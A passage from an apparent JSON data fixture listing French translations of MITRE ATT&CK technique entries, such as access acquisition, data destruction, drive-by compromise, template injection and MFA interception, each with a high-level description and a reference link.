ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1650 - Acqu\u00e9rir l\u2019acc\u00e8s", - "description": "Les adversaires peuvent acheter ou acqu\u00e9rir un acc\u00e8s existant \u00e0 un syst\u00e8me ou \u00e0 un r\u00e9seau cible. Une vari\u00e9t\u00e9 de services en ligne et de r\u00e9seaux de courtiers d\u2019acc\u00e8s initial sont disponibles pour vendre l\u2019acc\u00e8s \u00e0 des syst\u00e8mes pr\u00e9c\u00e9demment compromis. (Citation : Microsoft Ransomware as a Service) (Citation : CrowdStrike Access Brokers) (R\u00e9f\u00e9rence : Krebs Access Brokers Fortune 500) Dans certains cas, les groupes adversaires peuvent former des partenariats pour partager des syst\u00e8mes compromis les uns avec les autres. (Citation: CISA Karakurt 2022) Les points d\u2019ancrage vers des syst\u00e8mes compromis peuvent prendre diverses formes, telles que l\u2019acc\u00e8s \u00e0 des portes d\u00e9rob\u00e9es plant\u00e9es (par exemple, [Web Shell](https://attack.mitre.org/techniques/T1505/003)) ou un acc\u00e8s \u00e9tabli via [Services externes \u00e0 distance](https://attack.mitre.org/techniques/T1133). Dans certains cas, les courtiers d\u2019acc\u00e8s implantent des syst\u00e8mes compromis avec un \u00ab\u00a0\u00c4\u00faload\u00a0\u00bb qui peut \u00eatre utilis\u00e9 pour installer des logiciels malveillants suppl\u00e9mentaires pour les clients payants. (Citation : Microsoft Ransomware as a Service) En tirant parti des r\u00e9seaux de courtiers d\u2019acc\u00e8s existants plut\u00f4t que de d\u00e9velopper ou d\u2019obtenir leurs propres capacit\u00e9s d\u2019acc\u00e8s initiales, un adversaire peut potentiellement r\u00e9duire les ressources n\u00e9cessaires pour prendre pied sur un r\u00e9seau cible et concentrer ses efforts sur les \u00e9tapes ult\u00e9rieures de compromission. Les adversaires peuvent donner la priorit\u00e9 \u00e0 l\u2019acquisition de l\u2019acc\u00e8s \u00e0 des syst\u00e8mes qui n\u2019ont pas de surveillance de s\u00e9curit\u00e9 ou qui ont des privil\u00e8ges \u00e9lev\u00e9s, ou \u00e0 des syst\u00e8mes qui appartiennent \u00e0 des organisations d\u2019un secteur particulier. (Citation : Microsoft Ransomware as a Service) (Citation : CrowdStrike Access Brokers) Dans certains cas, l\u2019achat d\u2019un acc\u00e8s \u00e0 une organisation dans des secteurs tels que la passation de march\u00e9s informatiques, le d\u00e9veloppement de logiciels ou les t\u00e9l\u00e9communications peut permettre \u00e0 un adversaire de compromettre des victimes suppl\u00e9mentaires via une [relation de confiance](https://attack.mitre.org/techniques/T1199), une [interception d\u2019authentification multifacteur](https://attack.mitre.org/techniques/T1111) ou m\u00eame une [compromission de la cha\u00eene d\u2019approvisionnement](https://attack.mitre.org/techniques/T1195).**Note:** bien que cette technique soit distincte d\u2019autres comportements tels que [Acheter des donn\u00e9es techniques] (https://attack.mitre.org/techniques/T1597/002) et [Justificatifs](https://attack.mitre.org/techniques/T1589/001), ils peuvent souvent \u00eatre utilis\u00e9s conjointement (en particulier lorsque l\u2019ancrage acquis n\u00e9cessite [Comptes valides](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1650\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1213 - Donn\u00e9es provenant de r\u00e9f\u00e9rentiels d\u2019informations", - "description": "Les adversaires peuvent tirer parti des r\u00e9f\u00e9rentiels d\u2019informations pour extraire des informations pr\u00e9cieuses. Les r\u00e9f\u00e9rentiels d\u2019information sont des outils qui permettent le stockage d\u2019informations, g\u00e9n\u00e9ralement pour faciliter la collaboration ou le partage d\u2019informations entre les utilisateurs, et peuvent stocker une grande vari\u00e9t\u00e9 de donn\u00e9es qui peuvent aider les adversaires \u00e0 atteindre d\u2019autres objectifs ou un acc\u00e8s direct \u00e0 l\u2019information cible. Les adversaires peuvent \u00e9galement abuser des fonctionnalit\u00e9s de partage externe pour partager des documents sensibles avec des destinataires ext\u00e9rieurs \u00e0 l\u2019organisation. Voici une br\u00e8ve liste d\u2019exemples d\u2019informations qui peuvent avoir une valeur potentielle pour un adversaire et qui peuvent \u00e9galement \u00eatre trouv\u00e9es dans un r\u00e9f\u00e9rentiel d\u2019informations :* Politiques, proc\u00e9dures et normes* Diagrammes de r\u00e9seau physiques / logiques* Diagrammes d\u2019architecture syst\u00e8me* Documentation technique du syst\u00e8me* R\u00e9f\u00e9rences de test / d\u00e9veloppement * Calendriers de travail / projet * Extraits de code source* Liens vers des partages r\u00e9seau et d\u2019autres ressources internesLes informations stock\u00e9es dans un r\u00e9f\u00e9rentiel peuvent varier en fonction de l\u2019instance sp\u00e9cifique ou environnement. Les r\u00e9f\u00e9rentiels d\u2019informations communs sp\u00e9cifiques incluent les plates-formes Web telles que [Sharepoint](https://attack.mitre.org/techniques/T1213/002) et [Confluence](https://attack.mitre.org/techniques/T1213/001), des services sp\u00e9cifiques tels que les r\u00e9f\u00e9rentiels de code, les bases de donn\u00e9es IaaS, les bases de donn\u00e9es d\u2019entreprise et d\u2019autres infrastructures de stockage telles que SQL Server.\nhttps://attack.mitre.org/techniques/T1213\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1200 - Ajouts mat\u00e9riels", - "description": "Les adversaires peuvent introduire des accessoires informatiques, du mat\u00e9riel de r\u00e9seau ou d\u2019autres dispositifs informatiques dans un syst\u00e8me ou un r\u00e9seau qui peuvent \u00eatre utilis\u00e9s comme vecteur pour y acc\u00e9der. Plut\u00f4t que de simplement connecter et distribuer des charges utiles via un stockage amovible (c\u2019est-\u00e0-dire [R\u00e9plication via un support amovible](https://attack.mitre.org/techniques/T1091)), des ajouts mat\u00e9riels plus robustes peuvent \u00eatre utilis\u00e9s pour introduire de nouvelles fonctionnalit\u00e9s et/ou caract\u00e9ristiques dans un syst\u00e8me qui peuvent ensuite \u00eatre utilis\u00e9es de mani\u00e8re abusive. Bien que les r\u00e9f\u00e9rences publiques \u00e0 l\u2019utilisation par les acteurs de la menace soient rares, de nombreuses \u00e9quipes rouges / testeurs d\u2019intrusion tirent parti des ajouts mat\u00e9riels pour l\u2019acc\u00e8s initial. Les produits commerciaux et open source peuvent \u00eatre exploit\u00e9s avec des capacit\u00e9s telles que l\u2019\u00e9coute passive du r\u00e9seau, la modification du trafic r\u00e9seau (c\u2019est-\u00e0-dire [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), l\u2019injection de frappe, la lecture de la m\u00e9moire du noyau via DMA, l\u2019ajout d\u2019un nouvel acc\u00e8s sans fil \u00e0 un r\u00e9seau existant, etc. (Citation: Ossmann Star f\u00e9vrier 2011) (Citation: Aleks Weapons Nov 2015) (R\u00e9f\u00e9rence : Frisk DMA ao\u00fbt 2016) (R\u00e9f\u00e9rence : McMillan Pwn mars 2012)\nhttps://attack.mitre.org/techniques/T1200\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1505 - Composant logiciel serveur", - "description": "Les adversaires peuvent abuser des fonctionnalit\u00e9s de d\u00e9veloppement extensibles l\u00e9gitimes des serveurs pour \u00e9tablir un acc\u00e8s persistant aux syst\u00e8mes. Les applications serveur d\u2019entreprise peuvent inclure des fonctionnalit\u00e9s qui permettent aux d\u00e9veloppeurs d\u2019\u00e9crire et d\u2019installer des logiciels ou des scripts pour \u00e9tendre les fonctionnalit\u00e9s de l\u2019application principale. Les adversaires peuvent installer des composants malveillants pour \u00e9tendre et abuser des applications serveur. (R\u00e9f\u00e9rence : volexity_0day_sophos_FW)\nhttps://attack.mitre.org/techniques/T1505\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1485 - Destruction des donn\u00e9es", - "description": "Les adversaires peuvent d\u00e9truire des donn\u00e9es et des fichiers sur des syst\u00e8mes sp\u00e9cifiques ou en grand nombre sur un r\u00e9seau pour interrompre la disponibilit\u00e9 des syst\u00e8mes, des services et des ressources r\u00e9seau. La destruction des donn\u00e9es est susceptible de rendre les donn\u00e9es stock\u00e9es irr\u00e9cup\u00e9rables par des techniques m\u00e9dico-l\u00e9gales en \u00e9crasant des fichiers ou des donn\u00e9es sur des lecteurs locaux et distants. (Citation: Symantec Shamoon 2012) (Citation: FireEye Shamoon Nov 2016) (Citation: Palo Alto Shamoon Nov 2016) (Citation : Kaspersky StoneDrill 2017) (Citation: Unit\u00e9 42 Shamoon3 2018) (Citation : Talos Olympic Destroyer 2018) Les commandes courantes de suppression de fichiers du syst\u00e8me d\u2019exploitation telles que del et rm ne suppriment souvent que les pointeurs vers les fichiers sans effacer le contenu des fichiers eux-m\u00eames, ce qui rend les fichiers r\u00e9cup\u00e9rables par une m\u00e9thodologie m\u00e9dico-l\u00e9gale appropri\u00e9e. Ce comportement est distinct de [Nettoyage du contenu du disque](https://attack.mitre.org/techniques/T1561/001) et [Effacement de la structure du disque](https://attack.mitre.org/techniques/T1561/002) car les fichiers individuels sont d\u00e9truits plut\u00f4t que des sections d\u2019un disque de stockage ou la structure logique du disque. Les adversaires peuvent tenter d\u2019\u00e9craser des fichiers et des r\u00e9pertoires avec des donn\u00e9es g\u00e9n\u00e9r\u00e9es al\u00e9atoirement pour les rendre irr\u00e9cup\u00e9rables. (Citation : Kaspersky StoneDrill 2017) (Citation: Unit\u00e9 42 Shamoon3 2018) Dans certains cas, des fichiers image \u00e0 orientation politique ont \u00e9t\u00e9 utilis\u00e9s pour \u00e9craser des donn\u00e9es. (Citation: FireEye Shamoon Nov 2016) (Citation: Palo Alto Shamoon Nov 2016) (Citation : Kaspersky StoneDrill 2017) Pour maximiser l\u2019impact sur l\u2019organisation cible dans les op\u00e9rations o\u00f9 l\u2019interruption de la disponibilit\u00e9 \u00e0 l\u2019\u00e9chelle du r\u00e9seau est l\u2019objectif, les logiciels malveillants con\u00e7us pour d\u00e9truire les donn\u00e9es peuvent avoir des fonctionnalit\u00e9s de type ver \u00e0 propager sur un r\u00e9seau en exploitant des techniques suppl\u00e9mentaires telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Dumping des informations d\u2019identification du syst\u00e8me d\u2019exploitation](https://attack.mitre.org/techniques/T1003) et [Partages d\u2019administration SMB/Windows](https://attack.mitre.org/techniques/T1021/002). (Citation: Symantec Shamoon 2012) (Citation: FireEye Shamoon Nov 2016) (Citation: Palo Alto Shamoon Nov 2016) (Citation : Kaspersky StoneDrill 2017) (Citation : Talos Olympic Destroyer 2018). Dans les environnements cloud, les adversaires peuvent tirer parti de l\u2019acc\u00e8s pour supprimer le stockage cloud, les comptes de stockage cloud, les images machine et d\u2019autres infrastructures cruciales pour les op\u00e9rations afin de nuire \u00e0 une organisation ou \u00e0 ses clients. (Citation : Destruction de donn\u00e9es - Threat Post) (R\u00e9f\u00e9rence : DOJ - Cisco Insider)\nhttps://attack.mitre.org/techniques/T1485\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1537 - Transf\u00e9rer des donn\u00e9es vers un compte cloud", - "description": "Les adversaires peuvent exfiltrer les donn\u00e9es en transf\u00e9rant les donn\u00e9es, y compris les sauvegardes d\u2019environnements cloud, vers un autre compte cloud qu\u2019ils contr\u00f4lent sur le m\u00eame service afin d\u2019\u00e9viter les transferts/t\u00e9l\u00e9chargements de fichiers typiques et la d\u00e9tection d\u2019exfiltration bas\u00e9e sur le r\u00e9seau. Un d\u00e9fenseur qui surveille les transferts volumineux vers l\u2019ext\u00e9rieur de l\u2019environnement cloud via des transferts de fichiers normaux ou via des canaux de commande et de contr\u00f4le peut ne pas surveiller les transferts de donn\u00e9es vers un autre compte au sein du m\u00eame fournisseur de cloud. Ces transferts peuvent utiliser les API existantes du fournisseur de cloud et l\u2019espace d\u2019adressage interne du fournisseur de cloud pour se fondre dans le trafic normal ou \u00e9viter les transferts de donn\u00e9es sur des interfaces r\u00e9seau externes. Des incidents ont \u00e9t\u00e9 observ\u00e9s o\u00f9 des adversaires ont cr\u00e9\u00e9 des sauvegardes d\u2019instances cloud et les ont transf\u00e9r\u00e9es vers des comptes distincts. (Citation: DOJ GRU Indictment Jul 2018)\nhttps://attack.mitre.org/techniques/T1537\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1189 - Compromission furtive", - "description": "Les adversaires peuvent acc\u00e9der \u00e0 un syst\u00e8me par l\u2019interm\u00e9diaire d\u2019un utilisateur visitant un site Web au cours normal de la navigation. Avec cette technique, le navigateur Web de l\u2019utilisateur est g\u00e9n\u00e9ralement cibl\u00e9 pour l\u2019exploitation, mais les adversaires peuvent \u00e9galement utiliser des sites Web compromis pour un comportement de non-exploitation tel que l\u2019acquisition de [Jeton d\u2019acc\u00e8s \u00e0 l\u2019application](https://attack.mitre.org/techniques/T1550/001). Il existe plusieurs fa\u00e7ons de fournir du code d\u2019exploitation \u00e0 un navigateur (c.-\u00e0-d. [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), notamment :* Un site Web l\u00e9gitime est compromis lorsque des adversaires ont inject\u00e9 une forme de code malveillant tel que JavaScript, iFrames et cross-site scripting* Les fichiers de script servis \u00e0 un site Web l\u00e9gitime \u00e0 partir d\u2019un compartiment de stockage cloud accessible en \u00e9criture publique sont modifi\u00e9s par un adversaire* Les publicit\u00e9s malveillantes sont pay\u00e9es et diffus\u00e9es par des fournisseurs de publicit\u00e9 l\u00e9gitimes (c.-\u00e0-d. [Publicit\u00e9 malveillante] (https://attack.mitre.org/techniques/T1583/008)) * Les interfaces d\u2019application Web int\u00e9gr\u00e9es sont exploit\u00e9es pour l\u2019insertion de tout autre type d\u2019objet pouvant \u00eatre utilis\u00e9 pour afficher du contenu Web ou contenir un script qui s\u2019ex\u00e9cute sur le client visiteur (par exemple, messages de forum, commentaires et autres contenus Web contr\u00f4lables par l\u2019utilisateur). Souvent, le site Web utilis\u00e9 par un adversaire est un site visit\u00e9 par une communaut\u00e9 sp\u00e9cifique, telle qu\u2019un gouvernement, une industrie particuli\u00e8re ou une r\u00e9gion, o\u00f9 l\u2019objectif est de compromettre un utilisateur sp\u00e9cifique ou un ensemble d\u2019utilisateurs en fonction d\u2019un int\u00e9r\u00eat commun. Ce type de campagne cibl\u00e9e est souvent r\u00e9f\u00e9r\u00e9 \u00e0 une compromission strat\u00e9gique du Web ou \u00e0 une attaque de point d\u2019eau. Il existe plusieurs exemples connus de ce ph\u00e9nom\u00e8ne. (Citation : Shadowserver Strategic Web Compromise) Processus de typique de compromission furtive : 1. Un utilisateur visite un site Web utilis\u00e9 pour h\u00e9berger le contenu contr\u00f4l\u00e9 par l\u2019adversaire.2. Les scripts s\u2019ex\u00e9cutent automatiquement, recherchant g\u00e9n\u00e9ralement les versions du navigateur et des plug-ins pour une version potentiellement vuln\u00e9rable. * L\u2019utilisateur peut \u00eatre tenu d\u2019aider dans ce processus en activant les scripts ou les composants actifs du site Web et en ignorant les bo\u00eetes de dialogue d\u2019avertissement.3. Lors de la d\u00e9couverte d\u2019une version vuln\u00e9rable, le code d\u2019exploitation est transmis au navigateur.4. Si l\u2019exploitation r\u00e9ussit, elle donnera \u00e0 l\u2019adversaire l\u2019ex\u00e9cution du code sur le syst\u00e8me de l\u2019utilisateur, \u00e0 moins que d\u2019autres protections ne soient en place. * Dans certains cas, une deuxi\u00e8me visite sur le site Web apr\u00e8s l\u2019analyse initiale est n\u00e9cessaire avant que le code d\u2019exploitation ne soit livr\u00e9. Contrairement \u00e0 [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), l\u2019objectif de cette technique est d\u2019exploiter un logiciel sur un point de terminaison client lors de la visite d\u2019un site Web. Cela donnera g\u00e9n\u00e9ralement \u00e0 un adversaire un acc\u00e8s aux syst\u00e8mes du r\u00e9seau interne au lieu des syst\u00e8mes externes qui peuvent se trouver dans une DMZ. Les adversaires peuvent \u00e9galement utiliser des sites Web compromis pour diriger un utilisateur vers une application malveillante con\u00e7ue pour [voler un jeton d\u2019acc\u00e8s \u00e0 l\u2019application](https://attack.mitre.org/techniques/T1528)s, comme les jetons OAuth, afin d\u2019acc\u00e9der \u00e0 des applications et des informations prot\u00e9g\u00e9es. Ces applications malveillantes ont \u00e9t\u00e9 livr\u00e9es via des fen\u00eatres contextuelles sur des sites Web l\u00e9gitimes. (Citation: Volexity OceanLotus Nov 2017)\nhttps://attack.mitre.org/techniques/T1189\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1498 - D\u00e9ni de service r\u00e9seau", - "description": "Les adversaires peuvent effectuer des attaques par d\u00e9ni de service r\u00e9seau (DoS) pour d\u00e9grader ou bloquer la disponibilit\u00e9 des ressources cibl\u00e9es pour les utilisateurs. Le DoS r\u00e9seau peut \u00eatre effectu\u00e9 en \u00e9puisant la bande passante r\u00e9seau sur laquelle les services s\u2019appuient. Les exemples de ressources incluent des sites Web sp\u00e9cifiques, des services de messagerie, DNS et des applications Web. Des adversaires ont \u00e9t\u00e9 observ\u00e9s en train de mener des attaques DoS en r\u00e9seau \u00e0 des fins politiques (Citation: FireEye OpPoisonedHandover f\u00e9vrier 2016) et de soutenir d\u2019autres activit\u00e9s malveillantes, y compris la distraction (Citation: FSISAC FraudNetDoS Septembre 2012), l\u2019hacktivisme et l\u2019extorsion. (R\u00e9f\u00e9rence : Symantec DDoS octobre 2014) Un DoS r\u00e9seau se produit lorsque la capacit\u00e9 de bande passante de la connexion r\u00e9seau \u00e0 un syst\u00e8me est \u00e9puis\u00e9e en raison du volume de trafic malveillant dirig\u00e9 vers la ressource ou des connexions r\u00e9seau et des p\u00e9riph\u00e9riques r\u00e9seau sur lesquels la ressource repose. Par exemple, un adversaire peut envoyer 10 Gbit/s de trafic \u00e0 un serveur h\u00e9berg\u00e9 par un r\u00e9seau avec une connexion Internet de 1 Gbit/s. Ce trafic peut \u00eatre g\u00e9n\u00e9r\u00e9 par un seul syst\u00e8me ou plusieurs syst\u00e8mes r\u00e9partis sur Internet, ce qui est commun\u00e9ment appel\u00e9 DoS distribu\u00e9 (DDoS). Pour effectuer des attaques DoS r\u00e9seau, plusieurs aspects s\u2019appliquent \u00e0 plusieurs m\u00e9thodes, notamment l\u2019usurpation d\u2019adresse IP et les botnets. Les adversaires peuvent utiliser l\u2019adresse IP d\u2019origine d\u2019un syst\u00e8me attaquant ou usurper l\u2019adresse IP source pour rendre le trafic d\u2019attaque plus difficile \u00e0 retracer jusqu\u2019au syst\u00e8me attaquant ou pour permettre la r\u00e9flexion. Cela peut augmenter la difficult\u00e9 des d\u00e9fenseurs \u00e0 se d\u00e9fendre contre l\u2019attaque en r\u00e9duisant ou en \u00e9liminant l\u2019efficacit\u00e9 du filtrage par adresse source sur les p\u00e9riph\u00e9riques de d\u00e9fense r\u00e9seau. Pour les attaques DoS ciblant directement le syst\u00e8me d\u2019h\u00e9bergement, consultez [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).\nhttps://attack.mitre.org/techniques/T1498\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1651 - Commande d\u2019administration du cloud", - "description": "Les adversaires peuvent abuser des services de gestion du cloud pour ex\u00e9cuter des commandes au sein de machines virtuelles ou d\u2019appareils joints hybrides. Des ressources telles qu\u2019AWS Systems Manager, Azure RunCommand et Runbooks permettent aux utilisateurs d\u2019ex\u00e9cuter \u00e0 distance des scripts dans des machines virtuelles en tirant parti des agents de machines virtuelles install\u00e9s. De m\u00eame, dans les environnements Azure AD, Microsoft Endpoint Manager permet aux administrateurs globaux ou Intune d\u2019ex\u00e9cuter des scripts en tant que SYSTEM sur des appareils locaux joints \u00e0 Azure AD.(Citation : AWS Systems Manager Run Command)(Citation : Microsoft Run Command)(Citation : SpecterOps Lateral Movement from Azure to On-Prem AD 2020)Si un adversaire obtient un acc\u00e8s administratif \u00e0 un environnement cloud, ils peuvent \u00eatre en mesure d\u2019abuser des services de gestion du cloud pour ex\u00e9cuter des commandes dans les machines virtuelles de l\u2019environnement ou les p\u00e9riph\u00e9riques hybrides locaux. En outre, un adversaire qui compromet un compte de fournisseur de services ou d\u2019administrateur d\u00e9l\u00e9gu\u00e9 peut \u00e9galement \u00eatre en mesure de tirer parti d\u2019une [relation de confiance](https://attack.mitre.org/techniques/T1199) pour ex\u00e9cuter des commandes dans des machines virtuelles connect\u00e9es. (Citation: MSTIC Nobelium Oct 2021)\nhttps://attack.mitre.org/techniques/T1651\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1221 - Injection de mod\u00e8les", - "description": "Les adversaires peuvent cr\u00e9er ou modifier des r\u00e9f\u00e9rences dans les mod\u00e8les de documents utilisateur pour dissimuler du code malveillant ou forcer les tentatives d\u2019authentification. Par exemple, la sp\u00e9cification Microsoft Office Open XML (OOXML) d\u00e9finit un format XML pour les documents Office (.docx, xlsx .pptx) afin de remplacer les anciens formats binaires (.doc, .xls, .ppt). Les fichiers OOXML sont regroup\u00e9s des archives ZIP compos\u00e9es de divers fichiers XML, appel\u00e9s parties, contenant des propri\u00e9t\u00e9s qui d\u00e9finissent collectivement le mode de rendu d\u2019un document. (R\u00e9f\u00e9rence : Microsoft Open XML juillet 2017) Les propri\u00e9t\u00e9s \u00e0 l\u2019int\u00e9rieur des parties peuvent faire r\u00e9f\u00e9rence \u00e0 des ressources publiques partag\u00e9es accessibles via des URL en ligne. Par exemple, les propri\u00e9t\u00e9s de mod\u00e8le peuvent r\u00e9f\u00e9rencer un fichier, servant de Blueprint de document pr\u00e9format\u00e9, qui est extrait lors du chargement du document. Les adversaires peuvent abuser de ces mod\u00e8les pour dissimuler initialement du code malveillant \u00e0 ex\u00e9cuter via des documents utilisateur. Les r\u00e9f\u00e9rences de mod\u00e8le inject\u00e9es dans un document peuvent permettre de r\u00e9cup\u00e9rer et d\u2019ex\u00e9cuter des charges utiles malveillantes lors du chargement du document. (Citation: SANS Brian Wiltse Template Injection) Ces documents peuvent \u00eatre livr\u00e9s via d\u2019autres techniques telles que [Phishing](https://attack.mitre.org/techniques/T1566) et/ou [Taint Shared Content](https://attack.mitre.org/techniques/T1080) et peuvent \u00e9chapper aux d\u00e9tections statiques car aucun indicateur typique (macro VBA, script, etc.) n\u2019est pr\u00e9sent jusqu\u2019\u00e0 ce que la charge utile malveillante soit r\u00e9cup\u00e9r\u00e9e. (Citation: Redxorblue Remote Template Injection) Des exemples ont \u00e9t\u00e9 vus dans la nature o\u00f9 l\u2019injection de mod\u00e8le a \u00e9t\u00e9 utilis\u00e9e pour charger du code malveillant contenant un exploit. (Citation: Injection de mod\u00e8le MalwareBytes OCT 2017) Les adversaires peuvent \u00e9galement modifier le mot de contr\u00f4le *\\template dans un fichier .rtf pour dissimuler puis t\u00e9l\u00e9charger du code malveillant. Cette valeur de mot de contr\u00f4le l\u00e9gitime est destin\u00e9e \u00e0 \u00eatre une destination de fichier d\u2019une ressource de fichier mod\u00e8le qui est r\u00e9cup\u00e9r\u00e9e et charg\u00e9e lors de l\u2019ouverture d\u2019un fichier .rtf. Toutefois, les adversaires peuvent modifier les octets d\u2019un fichier .rtf existant pour ins\u00e9rer un champ de mot de contr\u00f4le de mod\u00e8le afin d\u2019inclure une ressource URL d\u2019une charge utile malveillante. (Citation : Proofpoint RTF Injection) (Citation: Ciberseguridad D\u00e9coder les fichiers RTF malveillants) Cette technique peut \u00e9galement activer [Authentification forc\u00e9e](https://attack.mitre.org/techniques/T1187) en injectant une URL SMB/HTTPS (ou une autre invite d\u2019informations d\u2019identification) et en d\u00e9clenchant une tentative d\u2019authentification. (Citation: Anomali Template Injection MAR 2018) (Citation : Talos Template Injection juillet 2017) (Citation : ryhanson phishery SEPTEMBRE 2016)\nhttps://attack.mitre.org/techniques/T1221\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1134 - Manipulation du jeton d\u2019acc\u00e8s", - "description": "Les adversaires peuvent modifier les jetons d\u2019acc\u00e8s pour qu\u2019ils fonctionnent dans un contexte de s\u00e9curit\u00e9 utilisateur ou syst\u00e8me diff\u00e9rent afin d\u2019effectuer des actions et de contourner les contr\u00f4les d\u2019acc\u00e8s. Windows utilise des jetons d\u2019acc\u00e8s pour d\u00e9terminer la propri\u00e9t\u00e9 d\u2019un processus en cours d\u2019ex\u00e9cution. Un utilisateur peut manipuler des jetons d\u2019acc\u00e8s pour faire appara\u00eetre un processus en cours d\u2019ex\u00e9cution comme s\u2019il \u00e9tait l\u2019enfant d\u2019un processus diff\u00e9rent ou appartenait \u00e0 quelqu\u2019un d\u2019autre que l\u2019utilisateur qui a d\u00e9marr\u00e9 le processus. Lorsque cela se produit, le processus prend \u00e9galement en charge le contexte de s\u00e9curit\u00e9 associ\u00e9 au nouveau jeton. Un adversaire peut utiliser des fonctions API Windows int\u00e9gr\u00e9es pour copier des jetons d\u2019acc\u00e8s \u00e0 partir de processus existants ; C\u2019est ce qu\u2019on appelle le vol de jetons. Ces jetons peuvent ensuite \u00eatre appliqu\u00e9s \u00e0 un processus existant (c\u2019est-\u00e0-dire [Usurpation d\u2019identit\u00e9/vol de jeton](https://attack.mitre.org/techniques/T1134/001)) ou utilis\u00e9s pour g\u00e9n\u00e9rer un nouveau processus (c\u2019est-\u00e0-dire [Cr\u00e9er un processus avec jeton](https://attack.mitre.org/techniques/T1134/002)). Un adversaire doit d\u00e9j\u00e0 \u00eatre dans un contexte d\u2019utilisateur privil\u00e9gi\u00e9 (c\u2019est-\u00e0-dire administrateur) pour voler un jeton. Cependant, les adversaires utilisent couramment le vol de jetons pour \u00e9lever leur contexte de s\u00e9curit\u00e9 du niveau administrateur au niveau SYSTEM. Un adversaire peut ensuite utiliser un jeton pour s\u2019authentifier aupr\u00e8s d\u2019un syst\u00e8me distant en tant que compte de ce jeton si le compte dispose des autorisations appropri\u00e9es sur le syst\u00e8me distant. (Citation: Manipulation de jetons Pentestlab) Tout utilisateur standard peut utiliser la commande runas et les fonctions de l\u2019API Windows pour cr\u00e9er des jetons d\u2019emprunt d\u2019identit\u00e9 ; Il ne n\u00e9cessite pas l\u2019acc\u00e8s \u00e0 un compte administrateur. Il existe \u00e9galement d\u2019autres m\u00e9canismes, tels que les champs Active Directory, qui peuvent \u00eatre utilis\u00e9s pour modifier les jetons d\u2019acc\u00e8s.\nhttps://attack.mitre.org/techniques/T1134\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1111 - Interception de l\u2019authentification multifacteur", - "description": "Les adversaires peuvent cibler les m\u00e9canismes d\u2019authentification multifacteur (MFA) (cartes \u00e0 puce, g\u00e9n\u00e9rateurs de jetons, etc.) pour acc\u00e9der aux informations d\u2019identification pouvant \u00eatre utilis\u00e9es pour acc\u00e9der aux syst\u00e8mes, aux services et aux ressources r\u00e9seau. L\u2019utilisation de l\u2019authentification multifacteur est recommand\u00e9e et offre un niveau de s\u00e9curit\u00e9 plus \u00e9lev\u00e9 que les noms d\u2019utilisateur et les mots de passe seuls, mais les organisations doivent conna\u00eetre les techniques qui pourraient \u00eatre utilis\u00e9es pour intercepter et contourner ces m\u00e9canismes de s\u00e9curit\u00e9. Si une carte \u00e0 puce est utilis\u00e9e pour l\u2019authentification multifacteur, un enregistreur de frappe devra \u00eatre utilis\u00e9 pour obtenir le mot de passe associ\u00e9 \u00e0 une carte \u00e0 puce lors d\u2019une utilisation normale. Avec une carte ins\u00e9r\u00e9e et l\u2019acc\u00e8s au mot de passe de la carte \u00e0 puce, un adversaire peut se connecter \u00e0 une ressource r\u00e9seau \u00e0 l\u2019aide du syst\u00e8me infect\u00e9 pour transmettre par proxy l\u2019authentification avec le jeton mat\u00e9riel ins\u00e9r\u00e9. (Citation : Mandiant M Trends 2011) Les adversaires peuvent \u00e9galement utiliser un enregistreur de frappe pour cibler de mani\u00e8re similaire d\u2019autres jetons mat\u00e9riels, tels que RSA SecurID. La capture de l\u2019entr\u00e9e de jeton (y compris le code d\u2019identification personnel d\u2019un utilisateur) peut fournir un acc\u00e8s temporaire (c\u2019est-\u00e0-dire rejouer le code d\u2019acc\u00e8s \u00e0 usage unique jusqu\u2019au prochain transfert de valeur) et \u00e9ventuellement permettre aux adversaires de pr\u00e9dire de mani\u00e8re fiable les valeurs d\u2019authentification futures (\u00e9tant donn\u00e9 l\u2019acc\u00e8s \u00e0 la fois \u00e0 l\u2019algorithme et \u00e0 toutes les valeurs de d\u00e9part utilis\u00e9es pour g\u00e9n\u00e9rer les codes temporaires ajout\u00e9s). (R\u00e9f\u00e9rence : GCN RSA juin 2011) D\u2019autres m\u00e9thodes d\u2019AMF peuvent \u00eatre intercept\u00e9es et utilis\u00e9es par un adversaire pour s\u2019authentifier. Il est courant que des codes \u00e0 usage unique soient envoy\u00e9s via des communications hors bande (e-mail, SMS). Si l\u2019appareil et/ou le service n\u2019est pas s\u00e9curis\u00e9, il peut \u00eatre vuln\u00e9rable \u00e0 l\u2019interception. Les fournisseurs de services peuvent \u00e9galement \u00eatre cibl\u00e9s : par exemple, un adversaire peut compromettre un service de messagerie SMS afin de voler des codes MFA envoy\u00e9s aux t\u00e9l\u00e9phones des utilisateurs. (Citation : Okta Scatter Swine 2022)\nhttps://attack.mitre.org/techniques/T1111\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1136 - Cr\u00e9er un compte", - "description": "Les adversaires peuvent cr\u00e9er un compte pour maintenir l\u2019acc\u00e8s aux syst\u00e8mes des victimes. Avec un niveau d\u2019acc\u00e8s suffisant, la cr\u00e9ation de tels comptes peut \u00eatre utilis\u00e9e pour \u00e9tablir un acc\u00e8s justificatif secondaire qui ne n\u00e9cessite pas le d\u00e9ploiement d\u2019outils d\u2019acc\u00e8s \u00e0 distance persistants sur le 